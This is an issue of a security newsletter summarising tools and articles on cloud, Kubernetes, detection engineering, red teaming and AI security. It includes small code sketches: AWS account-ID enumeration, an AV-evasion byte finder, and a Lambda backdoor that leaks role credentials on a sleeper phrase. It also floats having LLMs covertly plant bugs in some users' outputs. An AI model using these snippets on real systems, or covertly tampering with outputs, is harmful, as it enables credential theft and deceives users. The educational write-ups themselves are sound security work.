
[tl;dr sec] #218 - Kubernetes Security Training Platform, Jupyter Attack Toolkit, Awesome GraphQL Security

Nine free k8s CTF scenarios, utilities for exploiting/persisting on Jupyter instances, GraphQL security tools, libraries, resources, etc.

Hey there,

I hope you’ve been doing well!

❤️‍🔥 tl;dr Love

OK this feels a bit awkward to share, but she gave me permission.

My friend Tanya Janca recorded a quick video about some dating discussions we had a number of years ago. She recently got engaged! 🙌 

Basically, the idea is to lean into who you are and find someone super into that, vs trying to be blandly, generically appealing to everyone.

Tanya is super hardworking and smart (and kind), so I thought she should emphasize that. If a potential suitor is intimidated by successful women, it won’t work out anyway, so she might as well be upfront about it and save everyone time.

Anywho, I hope you had a wonderful consumer-culture-fabricated Valentine’s Day!

If you’re still looking, I’m confident that if you keep working on growing into the best version of yourself and putting yourself out there, you’ll find them 💘 

📺️ Upcoming Talks

I’m excited to be a part of Cycode’s ASPM Nation on February 29th, along with security leaders from TikTok, Ford, EY, and more. I’ll be discussing supply chain security. More on this below.

I’m also stoked to be doing a webinar with OffSec on February 28th about building a scalable security program, including useful mindsets, embracing secure defaults, and investing in a supportive security culture.

Hope to see you there! 👋 


📣 CNAPP for Geniuses (And Everyone Else)

We think great cloud security should be simple. Instead, the rest of the world is churning out 50-page explainers.

So, we created the easiest-to-digest guide to CNAPP you will ever see. If you want the actual TL;DR on CNAPP (hint - it starts with runtime security), don’t spend days reading someone’s PhD dissertation - check out our comprehensive 8-step CNAPP guide.

Read CNAPP in 8 Simple Steps.

TL;DR’s are where it’s at! 👆️ 


A curated list of GraphQL security frameworks, libraries, software, and resources. Heavily weighted toward Escape Tech, but with some entries from others too.

Maturing Your Threat Modeling Skills
Threat modeling legend Adam Shostack joins We Hack Purple founder Tanya Janca to discuss how to balance structure and free-flowing exploration to ensure comprehensive threat models, how to seamlessly integrate threat modeling into your SDLC, and more.

By FreeLabz: The pentester’s Swiss army knife. A task and workflow runner that wraps dozens of security tools, including httpx, gau, katana, ffuf, subfinder, msfconsole, wpscan, nmap, nuclei, and more.

Mercari’s passkey adoption
Nicely detailed post on adding passkeys as an authentication option, potential attack scenarios, where you might want to enforce passkeys (e.g. highly sensitive operations, adding a new passkey), potential UX concerns, the value of having a proximity boundary between the device requesting registration and the device receiving the authentication request, and more.

GitHub's Engineering Fundamentals program: How we deliver on availability, security, and accessibility
GitHub describes their Engineering Fundamentals program, a governance program to define, measure, and sustain engineering excellence. They measure progress using Scorecards, which indicate if a service has reached some expected level of performance (e.g. secret scanning).

Each service has a set of attributes that are captured and maintained in a YAML file in that repo, such as service tier (criticality to business), quality of service, service type, ownership info, sponsor, team name, and contact info. The Fundamental scorecards read the service’s YAML file and start monitoring the applicable services based on their attributes.
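Based on the attributes listed in the post, such a per-repo metadata file might look something like this (the key names here are my illustration, not GitHub’s actual schema):

```yaml
# Hypothetical service metadata file that a Fundamentals scorecard could read.
service:
  name: billing-api
  type: api
  tier: 1                    # criticality to the business
  quality_of_service: critical
  ownership:
    team: payments-platform
    sponsor: vp-engineering
    contact: "#payments-oncall"
```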


📣 First to see, first to detect

In today's fast-paced digital world, SMBs face a critical challenge: a lengthy 204-day mean time to identify (MTTI) a security breach. As cyber threats soar and skilled professionals remain scarce, effective solutions are essential to tackle the newest ransomware variants.

With ESET’s MDR tailored for SMBs, you gain the upper hand against emerging ransomware strains, effectively identifying and neutralizing cyber threats. Our dedicated threat intelligence research ensures rapid detection and mitigation of cybercrime, including zero-day attacks.

By combining ESET’s AI-powered threat detection with expert human oversight, your security is strengthened with another layer of sophisticated protection.

Cloud Security

By Dirk-jan Mollema: A collection of Azure AD tools for offensive and defensive security purposes.

CIEM Part 1: How least privilege leads to a false sense of security 
In this series on Cloud Identity Entitlement Management, Robert de Meyer argues that true least privilege is impossible in most environments, that the real focus should be on protecting business-critical assets while minimizing the impact on org productivity, and walks through some IAM nuance. Part 2 is on measuring risk probability in IAM, and part 3 is on mastering privilege management for devs.

Conditional Love for AWS Metadata Enumeration
Plerion’s Daniel Grzelak on how it’s possible to read resource tags, account IDs and other metadata from any accessible AWS resource using condition keys like “aws:ResourceAccount” and “StringLike” to brute force values one character at a time. They’ve also released a tool, Conditional Love, which does not in fact repeat choice words from my parents, but automates this attack.
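The core trick is a character-by-character brute force: probe with wildcard patterns like “1*”, “12*”, … and observe whether access succeeds. Here’s a minimal sketch of that loop, where `check_access(pattern)` is a stand-in for attaching a policy with a `StringLike` condition on `aws:ResourceAccount` and testing the request (so the logic can be shown without AWS credentials):

```python
def brute_force_account_id(check_access, length=12, alphabet="0123456789"):
    """Recover a 12-digit AWS account ID one character at a time.

    check_access(pattern) must return True if a request succeeds when the
    policy condition restricts aws:ResourceAccount to `pattern` (a wildcard
    pattern like "1234*"). In a real attack this is an AWS API call; here
    it's any caller-supplied callable.
    """
    known = ""
    for _ in range(length):
        for ch in alphabet:
            if check_access(known + ch + "*"):
                known += ch  # this character matched; lock it in
                break
        else:
            break  # no character matched; stop early
    return known
```

Tools like Conditional Love automate exactly this pattern, and the same approach extends to other metadata exposed via condition keys, like resource tags.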

Container Security

By ControlPlane: A Kubernetes security training platform. It creates a Kubernetes cluster in your AWS account, runs scenarios that misconfigure it and/or leave it vulnerable to compromise, and trains you in mitigating those vulnerabilities. It currently has nine CTF scenarios.

Images as Code: The pursuit of declarative image builds
Chainguard’s Matt Moore recounts the journey to declarative image builds, which required moving away from things like the imperative use of RUN in Dockerfiles. Some neat history about Bazel, creating distroless, apko, a Terraform provider for ko, and overall the technical pieces that needed to come together. I appreciate posts like this that share an arc of how and why an area has evolved over time.

Kubernetes security fundamentals: Authentication
Datadog’s Rory McCune discusses the pros and cons of various authentication methods in Kubernetes and when you might use them, including internal methods (X.509 client certificates, service account tokens), external methods (OIDC, authenticating or impersonating proxy), and authentication for other Kubernetes components (kubelet, controller manager and scheduler, kube-proxy, etcd).

To be honest, when I read posts that nicely detail the nuances of Kubernetes, I get a little sad inside and think, “This is why we can’t have nice things” 😅 

Sponsored Event

🔊Join Cycode’s ASPM Nation to get Innovative Strategies for Developing Secure Applications 🔊

Security trailblazers! You’re invited to ASPM Nation, presented by Cycode, on February 29th. At this virtual event, you’ll get CISO-tested frameworks & the very latest best practices on secure software development from impressive security leaders (from Ford, EY, TikTok, and more).

Don’t miss the special closing keynote from former Global CSO of TikTok, ADP, & EMC on why ASPM platforms are the future of application security, AND…Clint Gibler’s (founder of tl;dr sec) panel ‘The Future of Code: Securing Against Software Supply Chain Attacks’.

Let’s shape the future of application security together.

I’m stoked to be speaking at ASPM Nation, hope to see you there!

Blue Team

By WithSecure Labs: A repository of code signing certificates known to have been leaked or stolen, then abused by threat actors. Includes a Python script that can generate YARA rules for all the certs.
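To illustrate the idea (this is my sketch, not WithSecure’s actual script), generating a YARA rule from a leaked-cert record boils down to templating the certificate’s identifying fields into a rule body:

```python
def yara_rule_for_cert(rule_name: str, serial_hex: str, subject: str) -> str:
    """Illustrative: build a YARA rule flagging PE files that embed a
    known-abused certificate, keyed on its serial number and subject name."""
    # Format the serial as a YARA hex byte pattern, e.g. "0a 1b 2c".
    serial_bytes = " ".join(serial_hex[i:i + 2] for i in range(0, len(serial_hex), 2))
    return f'''rule {rule_name}
{{
    meta:
        description = "PE signed with known-abused certificate: {subject}"
    strings:
        $serial = {{ {serial_bytes} }}
        $subject = "{subject}" ascii wide
    condition:
        uint16(0) == 0x5A4D and all of them
}}'''
```

The `uint16(0) == 0x5A4D` condition restricts matches to files starting with the `MZ` magic bytes, i.e. PE executables.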

Identifying and Mitigating Living Off the Land Techniques
New free 46-page PDF from CISA, NSA, and others with guidance on common living off the land (LOTL) techniques used by threat actors, as well as common gaps in defense capabilities, such as observed network defense weaknesses that make it difficult to distinguish malicious activity from legitimate behavior.

Writing Practical Splunk Detection Rules — Part 1
Vit Bukac walks through a practical example of how to create a Splunk rule that identifies hosts in your network that are likely engaged in coinmining, and describes how it can be improved to include rich contextual info and minimize analyst alert fatigue. Love the extensive related work links, nice!

Getting Started with Detection-as-Code and Chronicle Security Operations
Google’s David French shares the principles and benefits of managing detection rules as code, an example detection engineering workflow, and how to configure a CI/CD pipeline job in GitLab to pull existing detection rules via Chronicle’s API and commit them to a GitLab project (code included).

In part two, David demonstrates how to create and modify detection rules via Chronicle’s API and a CI/CD pipeline.

Red Team

By NVIDIA’s Joe Lucas: A CLI application for interacting with authenticated Jupyter instances. Built-in modules for enumerating, exploiting, and persisting on the host. This could be used to backdoor or steal a model if you have initial access to the Jupyter instance (e.g. recovered a token or password).

By Slowerzs: A collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. It works by making the target application load a malicious library, which performs in-memory hooking to gather credentials.

Identifying Malicious Bytes in Malware
Zavier Lee describes how malicious byte sequences can be used by security products to identify and detect malware, and how a red teamer can identify these bytes and replace them to evade static detection. Zavier also wrote GoCheck, which identifies the exact bytes that Windows Defender AV flags by feeding byte slices to MpCmdRun.exe.
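The “feed byte slices to the scanner” approach is essentially a binary search: scan ever-smaller prefixes of the binary until you pinpoint where detection first triggers. A minimal sketch of that search, with `is_flagged(chunk)` standing in for invoking the AV engine (GoCheck shells out to MpCmdRun.exe; here it’s any callable):

```python
def find_flagged_offset(data: bytes, is_flagged) -> int:
    """Binary-search for the smallest prefix length of `data` that the
    scanner flags, which localizes the malicious byte sequence.

    Assumes is_flagged(data) is True and is_flagged(b"") is False.
    """
    lo, hi = 0, len(data)
    # Invariant: data[:lo] scans clean, data[:hi] is flagged.
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_flagged(data[:mid]):
            hi = mid  # detection triggers within the first `mid` bytes
        else:
            lo = mid  # the first `mid` bytes are clean
    return hi  # first prefix length that triggers detection
```

Once the offset is known, the red teamer can inspect and rewrite just those bytes (e.g. re-encode a string or instruction sequence) to evade the static signature.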


AI + Security

In a GenAI world. Only Identity Matters.
In a world (movie trailer voice) where text, images, voice, and video can be easily created for almost anything, Caleb Sima argues that identity and intent are critical, fundamental building blocks.

Required Security Changes for Secure AI Agents
Joseph Thacker proposes a number of areas that need improvement if AI agents are going to be both capable and secure, including a hardened sandbox (so compromising one service doesn’t give access to everything), credentialed UI access for services that don’t yet have an API, agent identity verification, audit logging, delegated authorization, and more.

Exploring Red Team Persistence via AWS Lex Chatbots
Lizzie Moratti walks through using an AWS Lex Service chatbot as a persistence method for a red teamer, for example, modifying a Lambda function such that when it’s provided a sleeper phrase (“the crow flies at midnight”) it will trigger malicious business logic to provide credentials for the Lambda’s role.
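A hypothetical fulfillment handler makes the trick concrete (this is my sketch, not Lizzie’s code; the `inputTranscript` field and response shape follow Lex’s Lambda event format, but treat the details as illustrative). Every normal utterance gets benign business logic, while the sleeper phrase leaks the execution role’s temporary credentials, which Lambda exposes via environment variables:

```python
import os

SLEEPER_PHRASE = "the crow flies at midnight"

def lambda_handler(event, context=None):
    """Hypothetical Lex fulfillment Lambda with a backdoored branch."""
    utterance = event.get("inputTranscript", "")
    if utterance.strip().lower() == SLEEPER_PHRASE:
        # Malicious branch: return the role's temporary credentials
        # to whoever spoke the sleeper phrase.
        message = "|".join(
            os.environ.get(k, "") for k in
            ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")
        )
    else:
        # Benign branch: whatever the bot normally fulfills.
        message = "How can I help you today?"
    return {
        "dialogAction": {
            "type": "Close",
            "fulfillmentState": "Fulfilled",
            "message": {"contentType": "PlainText", "content": message},
        }
    }
```

Since the chatbot is a legitimate, internet-facing entry point, this survives credential rotation and is easy to overlook in an incident response sweep.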

Disrupting malicious uses of AI by state-affiliated threat actors
OpenAI terminated accounts associated with five state-affiliated threat actors (from China, Iran, North Korea, and Russia), and their post breaks down what each was using OpenAI services for:

  • Researching public info on various companies and cybersecurity tools; translating technical papers; and identifying experts and orgs focused on defense issues, intelligence agencies, regional threat actors, satellite communication protocols, and radar imaging technology.

  • Researching technical details like common ways processes could be hidden on a system, ways malware could evade detection, understanding publicly available vulnerabilities, etc.

  • Coding tasks like writing scripts, web apps, etc.

  • Generating spear phishing campaign content.

This Microsoft blog post has additional technical details, including an appendix containing a full list of the LLM-themed TTPs. “Microsoft and OpenAI have not yet observed particularly novel or unique AI-enabled attack or abuse techniques resulting from threat actors’ usage of AI,” but rather incremental help.

💡 While terminating all of these actors’ accounts sounds good, I wonder if there would be more value in leaving them on: it would basically be like wiretapping adversaries and seeing what targets they were interested in, the malware they were writing, etc.

Maybe LLM providers could be super sneaky, and have the LLM, just for those accounts, introduce very subtle bugs that would allow fingerprinting of the malware or command and control systems, or insert some keywords or phrasing into phishing content that can be passed along to email providers and social media networks for easy flagging. Take advantage of owning the platform!

Lastly, Andrew Ng’s newsletter had a nice framework for thinking about different levels of privacy for AI providers. And how the text of some ancient scrolls that were turned to charcoal have been recovered using ML 🤯 


Shout-out to @securibee whose Hive Five newsletter is great and introduced me to a number of these.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!